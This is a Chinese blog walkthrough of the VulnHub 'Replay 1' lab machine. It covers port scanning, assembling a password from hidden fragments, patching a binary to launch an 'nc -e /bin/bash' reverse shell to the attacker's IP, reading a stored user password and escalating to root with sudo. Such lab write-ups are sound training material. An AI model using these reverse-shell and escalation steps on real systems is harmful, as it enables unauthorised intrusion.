vulnhub-Replay 1靶机

于 2024-10-02 10:09:04 发布
阅读量250 收藏 5
点赞数 10
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142678825
版权

vulnhub:https://www.vulnhub.com/entry/replay-1,278/

导入靶机,放在kali同网段,扫描

image-20240927085646526

靶机在192.168.81.8,扫描端口

image-20240927085717794

开启了三个端口,存在网站服务,访问

image-20240927085835062

网页上有个超链接,点击后下载了这样一个文档文件

image-20240927085943383

网页元素里有这么一行

image-20240927090031783

P1:qGQjwO4h6g,目前作用未知,扫描网站目录

image-20240927090210763

扫到几个,查看一下,files和media都是网页直接能访问到的东西,没啥用,robots指出一个新的文件

image-20240927090444656

下载下来,解压出来一个文档和一个程序

image-20240927090558546

文档里没有有用的内容,当以字符串查看程序时找到这样一句话

image-20240927090822043

之前找到一个P1,应该是要和这个拼接成一个密码

qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul

现在尝试运行程序

image-20240927091414781

输入IP和密码后成功执行,但是输入命令时又提示不允许

image-20240927091452105

看了网上的分析这个程序实际上执行的是文件里的whoami,修改为uname -a,同时删除as后的冒号和空格

image-20240927091723618

image-20240927092315522

保存后再次执行

image-20240927092515735

这次这里显示的就不是Bob,而是新写入的命令,所以我们写入反弹shell的命令,但是要注意写入时要让文件大小不变,所以需要插入额外的字符

nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

image-20240927093027814

kali开启监听,再次执行程序

image-20240927093155844

获得shell,生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

sudo命令需要密码,找找看

在bob家目录的文档文件夹下的.ftp文件夹找到了bob的密码文档

image-20240927093442062

b0bcat_1234567890

image-20240927093630304

显示我们可以用所有的sudo命令,sudo su提权

image-20240927093658680

flag在根文件夹

image-20240927093746001

生草工坊
关注
canoe回放导出数据_CANoe教程 | 仿真功能 - Replay Block
weixin_39980234的博客
12-19 2786
概述Replay Block用来回放用户保存的测量数据文件。用户可以将录制的log文件或是自己编辑的log文件导入Replay Block回放。Replay Block支持的总线类型:CANLINMOSTFlexRayEthernet如何新建一个Replay Block在Simulation Setup窗口中虚拟总线上右击鼠标打开 菜单选择Insert Replay Block CANInsert...
pysc2-replay-master.rar
09-10
"pysc2-replay-master.rar" 是一个专门针对《星际争霸2》(StarCraft II)游戏的Python库——PySC2(Python StarCraft II Library)的回放解析项目。这个压缩包包含了所有必要的资源,帮助开发者和研究人员深入理解...
mysql-replay-module
猴子哥哥的博客
11-05 1721
tcpcopy-module mysql-replay-module
渗透测试靶机----Raven-1
久恙502的博客
04-05 411
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
Mahimahi: Accurate Record-and-Replay for HTTP论文阅读笔记
ganggang的博客
04-25 2019
Mahimahi: Accurate Record-and-Replay for HTTP Abstract: 本文介绍了Mahimahi,它是一个框架,用于记录来自基于HTTP的应用程序的流量,并在模拟的网络条件下对其进行重放。 文章内容: 我们通过以下方式评估Mahimahi:(1)分析500个站点上的HTTP / 1.1,SPDY和QUIC的性能,(2)使用Mahimahi理解这些协...
从 MySQL 迁移到 TiDB:使用 SQL-Replay 工具进行真实线上流量回放测试 SOP
TiDB_PingCAP 的博客
08-10 1222
1.1 工具简介SQL-Replay 工具是一个设计用于回放 MySQL 慢查询文件和 parse-tshark 抓包文件的 GitHub 开源项目,目的是帮助评估数据库兼容性和性能。这个工具支持多种操作模式,包括解析慢查询日志、回放这些日志、将回放结果加载到数据库中以及生成报告。1.2 原理概述a. MySQL 的慢日志文件以及通过 parse-tshark 抓包生成的文件,这些日志中包括 SQL 执行时间、SQL 文本。
tcpreplay -h 中文翻译
shitgun的博客
01-05 1502
方便tcpreplay 使用而写,以方便日后查阅
CANoe教程 | 仿真功能 - Replay Block
10-05 1506
概述 Replay Block用来回放用户保存的测量数据文件。用户可以将录制的log文件或是自己编辑的log文件导入Replay Block回放。 Replay Block支持的总线类型: CAN LIN MOST FlexRay Ethernet 如何新建一个Replay Block 在Simulation Setup窗口中虚拟总线上右击鼠标打开 菜单选择Insert Replay Block CAN Insert Replay Block CAN 如下图所示: Replay Block 设置 双
活体检测——Replay-Attack数据集
小花生的博客
05-15 3042
Replay-Attack人脸防作伪数据集 参考论文:《On the Effectiveness of Local Binary Patterns in Face Anti-spoofing》 下载链接: https://www.idiap.ch/en/dataset/replayattack 数据集描述:   Replay-Attack数据库由1300个视频组成,这些视频在不同的光照条件下对50个实验人员进行真假人脸的样本采集。数据库由瑞士的IDIAP研究所建立。   总共有1300个视频,分成了四个
工具使用--tcpreplay--填坑
我不是庸医
05-29 757
测试一个网络时,建议不要用-t的参数,保修比较困难,最好速度设置小,避免乱序 tcpreplay -I eth3008 -i eth3007 -t -c iec104_00045.pcap.route.cache iec104_00045.pcap.route [root@localhost iec_dual]# tcpreplay -I eth3008 -i eth3007 -p 1 -c iec104_00045.pcap.route.cache iec104_00045.pcap.rou...
dpdk-replay.rar_dpdk_dpdk 数据回放_linux_recognize7z9
07-14
使用dpdk高速回放pcap文件,分为拷贝和不拷贝版本,可根据需要自行选择
warcraft-3-replay-parser
05-18
为了更好地分析和研究这些重播,开发者们创建了“warcraft-3-replay-parser”,一个基于Python的工具,专门用于解析魔兽争霸3的重播文件。本文将深入探讨该解析器的工作原理、应用领域以及如何使用。 首先,我们要...
rf-jam-replay:车辆无钥匙进入系统的卡塞和重播攻击
03-11
$ 1(任何短铜线) (可选)Wi-Fi适配器 15美元(AliExpress) 全部的 211美元(带Wi-Fi适配器的226美元) Arduino版本 物品 澳元(商店)的价格 Arduino Pro迷你版 3美元(eBay) CC1101射频收发器 6美元(eBay...
page-replay:从本地缓存重播页面,遵守多个域的负载行为
05-19
./replay.js http://mywebsite.com/page --domains mywebsite.com,cdnjs.com,something.static.com --delay 3000 资源将被保存到./data目录中,页面本身将以.html格式保存在工作目录中-然后,您可以根据需要对其...
机器人路径优化:基于强化学习Q-learning算法的移动机器人路径优化MATLAB
10-04
机器人路径优化:基于强化学习Q-learning算法的移动机器人路径优化MATLAB
基于Java、Kotlin和C++的多语言支持的WidgetCase自定义控件通用库设计源码
10-04
本项目是一款支持Java、Kotlin和C++的多语言自定义控件通用库,包含176个文件,涵盖43个PNG图片、41个Java源文件、40个XML布局文件、21个Kotlin源文件、4个Gradle配置文件及其他相关文件。库提供详尽的API文档,支持持续集成与维护,旨在提供便捷、高效的自定义控件开发体验。
基于树莓派的HarmonyOS系统移植与开发设计源码
最新发布
10-04
本项目为基于树莓派的HarmonyOS系统移植与开发设计源码,包含116个文件,涵盖20个头文件、19个Markdown文档、16个C语言源文件、7个PNG图片文件、7个PDF文件、4个二进制文件、4个ELF文件、4个gn文件、3个HCS文件,以及使用C、Shell和Python等多种编程语言编写。该源码旨在实现HarmonyOS系统在树莓派平台上的移植与应用开发。
replay-attack数据集
09-01
replay-attack数据集是一个广泛使用的用于生物特征识别领域的数据集。该数据集主要用于评估生物特征识别系统对于"replay attacks"(重放攻击)的鲁棒性。 重放攻击是一种常见的生物特征识别系统攻击方法之一,攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值